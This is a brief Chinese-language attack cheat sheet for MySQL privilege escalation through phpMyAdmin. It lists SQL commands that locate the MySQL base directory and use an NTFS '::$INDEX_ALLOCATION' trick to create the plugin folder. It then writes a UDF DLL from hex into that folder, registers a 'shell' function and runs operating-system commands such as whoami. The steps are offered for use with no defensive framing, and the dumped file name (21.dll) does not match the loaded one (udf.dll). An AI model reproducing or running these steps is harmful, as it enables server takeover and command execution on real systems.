# PhpMyAdmin UDF 提权

select @@basedir

(或者

select @@datadir

)

select 'xxx' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION'; 此时会报错 ERROR 3 (HY000): Error writing file 'C:\MySQL\lib::$INDEX_ALLOCATION' (Errcode: 22)

select 'xxx' into dumpfile 'C:\\MySQL\\lib\\plugin::\$INDEX_ALLOCATION';

create table udftmp (c blob)

insert into udftmp values(convert(0x十六进制代码,CHAR))

//十六进制代码就是UDF.dll的十六进制代码

select c from udftmp into dumpfile "C:/hylanda/phpStudy/MySQL/lib/plugin/21.dll";--

CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'

//此处不能填绝对路径 只能是dll名

select shell('cmd','whoami');

//提权开始。

